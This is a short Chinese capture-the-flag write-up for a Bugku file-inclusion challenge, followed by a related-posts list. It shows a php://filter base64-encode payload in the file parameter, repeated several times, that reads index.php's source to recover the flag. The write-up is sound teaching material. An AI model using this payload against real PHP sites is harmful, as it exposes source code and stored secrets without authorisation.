bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
uwvwko11 小时前
ctfhow——web入门214~218(时间盲注开始)
前端·数据库·mysql·ctf
uwvwko8 天前
ctfshow——web入门191~194
前端·数据库·mysql·安全·ctf
不想学密码的程序员不是好的攻城狮11 天前
TGCTF web
python·网络安全·web·ctf
huan666*19 天前
CTF类题目复现总结-hashcat 1
ctf·office文件密码破解·john工具使用
ALe要立志成为web糕手22 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
ad禥思妙想22 天前
NSSCTF(MISC)—[justCTF 2020]pdf
ctf·misc
石氏是时试25 天前
[VolgaCTF 2025] Baby-Welcome,BrokeBroke,Field Rules
ctf
Sweet_vinegar25 天前
变量1(WEB)
安全·web·ctf·bugku
Sweet_vinegar1 个月前
Wire1
安全·ctf·misc·攻防世界
落寞的魚丶1 个月前
2025年河北省第二届职业技能大赛网络安全项目 模块 B样题任务书
ctf·2025河北省赛·2025河北第二届技能大赛·模块b